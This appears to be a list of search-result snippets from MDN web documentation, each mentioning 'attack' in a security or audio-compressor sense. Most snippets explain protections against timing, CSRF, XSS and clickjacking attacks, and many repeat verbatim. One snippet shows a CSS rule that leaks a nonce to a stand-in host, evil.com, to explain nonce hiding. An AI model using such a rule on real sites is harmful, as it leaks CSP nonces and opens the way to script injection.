console.log(audioctx.currenttime); reduced time precision to offer protection against timing attacks and fingerprinting, the precision of audioctx.currenttime might get rounded depending on browser settings.

Constraint validation API - Web APIs
even though client-side validation can prevent many common kinds of invalid values, invalid ones can still be sent by older browsers or by attackers trying to trick your web application.

DynamicsCompressorNode() - Web APIs
options optional options are as follows: attack: the amount of time (in seconds) to reduce the gain by 10db.

DynamicsCompressorNode.knee - Web APIs
a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...

DynamicsCompressorNode.ratio - Web APIs
a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...

DynamicsCompressorNode.release - Web APIs
a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...

DynamicsCompressorNode.threshold - Web APIs
a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...

Event.timeStamp - Web APIs
</p> <p>timestamp: <span id="time">-</span></p> javascript function gettime(event) { var time = document.getelementbyid("time"); time.firstchild.nodevalue = event.timestamp; } document.body.addeventlistener("keypress", gettime); result reduced time precision to offer protection against timing attacks and fingerprinting, the precision of event.timestamp might get rounded depending on browser settings.

File.lastModified - Web APIs
const filewithdate = new file([], 'file.bin', { lastmodified: new date(2017, 1, 1), }); console.log(filewithdate.lastmodified); //returns 1485903600000 const filewithoutdate = new file([], 'file.bin'); console.log(filewithoutdate.lastmodified); //returns current time reduced time precision to offer protection against timing attacks and fingerprinting, the precision of somefile.lastmodified might get rounded depending on browser settings.

File.lastModifiedDate - Web APIs
ut is a htmlinputelement: <input type="file" multiple id="myfileinput"> var fileinput = document.getelementbyid("myfileinput"); // files is a filelist object (simliar to nodelist) var files = fileinput.files; for (var i = 0; i < files.length; i++) { alert(files[i].name + " has a last modified date of " + files[i].lastmodifieddate); } reduced time precision to offer protection against timing attacks and fingerprinting, the precision of somefile.lastmodifieddate.gettime() might get rounded depending on browser settings.

HTMLMediaElement.currentTime - Web APIs
example var video = document.createelement('video'); console.log(video.currenttime); usage notes reduced time precision to offer protection against timing attacks and fingerprinting, browsers may round or otherwise adjust the value returned by currenttime.

HTMLOrForeignElement.nonce - Web APIs
nonce hiding helps preventing that attackers exfiltrate nonce data via mechanisms that can grab data from content attributes like this: script[nonce~=whatever] { background: url("https://evil.com/nonce?whatever"); } specifications specification html living standardthe definition of 'nonce' in that specification.

Node.textContent - Web APIs
moreover, using textcontent can prevent xss attacks.

Pbkdf2Params - Web APIs
in this context, slow is good, since it makes it more expensive for an attacker to run a dictionary attack against the keys.

Push API - Web APIs
see the following articles for more information: cross-site request forgery (csrf) prevention cheat sheet preventing csrf and xsrf attacks for an app to receive push messages, it has to have an active service worker.

RTCIceCandidate.usernameFragment - Web APIs
this avoids crosstalk among multiple ongoing ice sessions, but, more importantly, helps secure ice transactions (and all of webrtc by extension) against attacks that might try to inject themselves into an ice exchange.

Service Worker API - Web APIs
having modified network requests, wide open to man in the middle attacks would be really bad.

SubtleCrypto.deriveKey() - Web APIs
the more times the process is repeated, the more computationally expensive key derivation is: this makes it harder for an attacker to use brute-force to discover the key using a dictionary attack.

TextDecoder.prototype.encoding - Web APIs
it is used to prevent attacks that mismatch encodings between the client and server.

Writing WebSocket servers - Web APIs
however, the server can deny them if they attempt too many connections in order to save itself from denial-of-service attacks.

Geometry and reference spaces in WebXR - Web APIs
const radians_per_degree = math.pi / 180.0; let degreestoradians = (deg) => deg * radians_per_degree; let radianstodegrees = (rad) => rad / radians_per_degree; times and durations note that for security reasons, domhighrestimestamp usually introduces a small amount of imprecision to the clock in order to prevent it from being used in fingerprinting and timing-based attacks.

Web Authentication API - Web APIs
this resolves significant security problems related to phishing, data breaches, and attacks against sms texts or other second-factor authentication methods while at the same time significantly increasing ease of use (since users don't have to manage dozens of increasingly complicated passwords).

Window.crypto - Web APIs
although the property itself is read-only, all of its methods (and the methods of its child object, subtlecrypto) are not read-only, and therefore vulnerable to attack by polyfill.

@document - CSS: Cascading Style Sheets
this has been limited to use only in user and ua sheets in firefox 59 in nightly and beta — an experiment designed to mitigate potential css injection attacks (see bug 1035091).

HTML5 Parser - Developer guides
if an attacker could force a premature end-of-file, the parser might change which parts of the document it considered to be executable scripts.

Introduction to HTML5 - Developer guides
this was done to tighten security and prevent some types of attacks.

<a>: The Anchor element - HTML: Hypertext Markup Language
using target="_blank" without rel="noreferrer" and rel="noopener" makes the website vulnerable to window.opener api exploitation attacks (vulnerability description), although note that, in newer browser versions (e.g.

<iframe>: The Inline Frame element - HTML: Hypertext Markup Language
sandboxing is useless if the attacker can display content outside a sandboxed iframe — such as if the viewer opens the frame in a new tab.

<input type="hidden"> - HTML: Hypertext Markup Language
this kind of attack is called a cross site request forgery (csrf); pretty much any reputable server-side framework uses hidden secrets to prevent such attacks.

<meta>: The Document-level Metadata element - HTML: Hypertext Markup Language
content policies mostly specify allowed server origins and script endpoints which help guard against cross-site scripting attacks.

HTTP authentication - HTTP
from firefox 59 onwards, image resources loaded from different origins to the current document are no longer able to trigger http authentication dialogs (bug 1423146), preventing user credentials being stolen if attackers were able to embed an arbitrary image into a third-party page.

Connection management in HTTP/1.x - HTTP
persistent connections also have drawbacks; even when idling they consume server resources, and under heavy load, dos attacks can be conducted.

Cross-Origin Resource Policy (CORP) - HTTP
cross-origin resource policy is a policy set by the cross-origin-resource-policy http header that lets web sites and applications opt in to protection against certain requests from other origins (such as those issued with elements like <script> and <img>), to mitigate speculative side-channel attacks, like spectre, as well as cross-site script inclusion attacks.

CSP: base-uri - HTTP
this is insecure; an attacker can also inject arbitrary data: uris.

CSP: child-src - HTTP
this is insecure; an attacker can also inject arbitrary data: uris.

CSP: connect-src - HTTP
this is insecure; an attacker can also inject arbitrary data: uris.

CSP: default-src - HTTP
this is insecure; an attacker can also inject arbitrary data: uris.

CSP: font-src - HTTP
this is insecure; an attacker can also inject arbitrary data: uris.

CSP: form-action - HTTP
this is insecure; an attacker can also inject arbitrary data: uris.

CSP: frame-ancestors - HTTP
this is insecure; an attacker can also inject arbitrary data: uris.

CSP: frame-src - HTTP
this is insecure; an attacker can also inject arbitrary data: uris.

CSP: img-src - HTTP
this is insecure; an attacker can also inject arbitrary data: uris.

CSP: manifest-src - HTTP
this is insecure; an attacker can also inject arbitrary data: uris.

CSP: media-src - HTTP
this is insecure; an attacker can also inject arbitrary data: uris.

CSP: navigate-to - HTTP
this is insecure; an attacker can also inject arbitrary data: uris.

CSP: object-src - HTTP
this is insecure; an attacker can also inject arbitrary data: uris.

CSP: prefetch-src - HTTP
this is insecure; an attacker can also inject arbitrary data: uris.

CSP: script-src-attr - HTTP
this is insecure; an attacker can also inject arbitrary data: uris.

CSP: script-src-elem - HTTP
this is insecure; an attacker can also inject arbitrary data: uris.

CSP: script-src - HTTP
this is insecure; an attacker can also inject arbitrary data: uris.

CSP: style-src-attr - HTTP
this is insecure; an attacker can also inject arbitrary data: uris.

CSP: style-src-elem - HTTP
this is insecure; an attacker can also inject arbitrary data: uris.

CSP: style-src - HTTP
this is insecure; an attacker can also inject arbitrary data: uris.

CSP: trusted-types - HTTP
this allows authors to define rules guarding writing values to the dom and thus reducing the dom xss attack surface to small, isolated parts of the web application codebase, facilitating their monitoring and code review.

CSP: upgrade-insecure-requests - HTTP
the upgrade-insecure-requests directive will not ensure that users visiting your site via links on third-party sites will be upgraded to https for the top-level navigation and thus does not replace the strict-transport-security (hsts) header, which should still be set with an appropriate max-age to ensure that users are not subject to ssl stripping attacks.

CSP: worker-src - HTTP
this is insecure; an attacker can also inject arbitrary data: uris.

Content-Security-Policy - HTTP
this helps guard against cross-site scripting attacks (xss).

Cross-Origin-Opener-Policy - HTTP
coop will process-isolate your document and potential attackers can't access to your global object if they were opening it in a popup, preventing a set of cross-origin attacks dubbed xs-leaks.

Public-Key-Pins - HTTP
the http public-key-pins response header used to associate a specific cryptographic public key with a certain web server to decrease the risk of mitm attacks with forged certificates, however, it has been removed from modern browsers and is no longer supported.

Server - HTTP
avoid overly-detailed server values, as they can reveal information that might make it (slightly) easier for attackers to exploit known security holes.

SameSite cookies - HTTP
none used to be the default value, but recent browser versions made lax the default value to have reasonably robust defense against some classes of cross-site request forgery (csrf) attacks.

X-Frame-Options - HTTP
sites can use this to avoid click-jacking attacks, by ensuring that their content is not embedded into other sites.

414 URI Too Long - HTTP
there are a few rare conditions when this might occur: when a client has improperly converted a post request to a get request with long query information, when the client has descended into a loop of redirection (for example, a redirected uri prefix that points to a suffix of itself), or when the server is under attack by a client attempting to exploit potential security holes.

425 Too Early - HTTP
the hypertext transfer protocol (http) 425 too early response status code indicates that the server is unwilling to risk processing a request that might be replayed, which creates the potential for a replay attack.

Grammar and types - JavaScript
(this is similar to string interpolation features in perl, python, and more.) optionally, a tag can be added to allow the string construction to be customized, avoiding injection attacks, or constructing higher-level data structures from string contents.

Date.prototype.getTime() - JavaScript
reduced time precision to offer protection against timing attacks and fingerprinting, the precision of new date().gettime() might get rounded depending on browser settings.

Date.now() - JavaScript
engines which have not been updated to support this method can work around the absence of this method using the following shim: if (!date.now) { date.now = function now() { return new date().gettime(); }; } examples reduced time precision to offer protection against timing attacks and fingerprinting, the precision of date.now() might get rounded depending on browser settings.

SharedArrayBuffer - JavaScript
for top-level documents, two headers will need to be set to cross-origin isolate your site: cross-origin-opener-policy with same-origin as value (protects your origin from attackers) cross-origin-embedder-policy with require-corp as value (protects victims from your origin) cross-origin-opener-policy: same-origin cross-origin-embedder-policy: require-corp to check if cross origin isolation has been successful, you can test against the crossoriginisolated property available to window and worker contexts: if (crossoriginisolated) { // post sharedarraybuffer } else {...

eval() - JavaScript
more importantly, a third-party code can see the scope in which eval() was invoked, which can lead to possible attacks in ways to which the similar function is not susceptible.

Same-origin policy - Web security
it helps isolate potentially malicious documents, reducing possible attack vectors.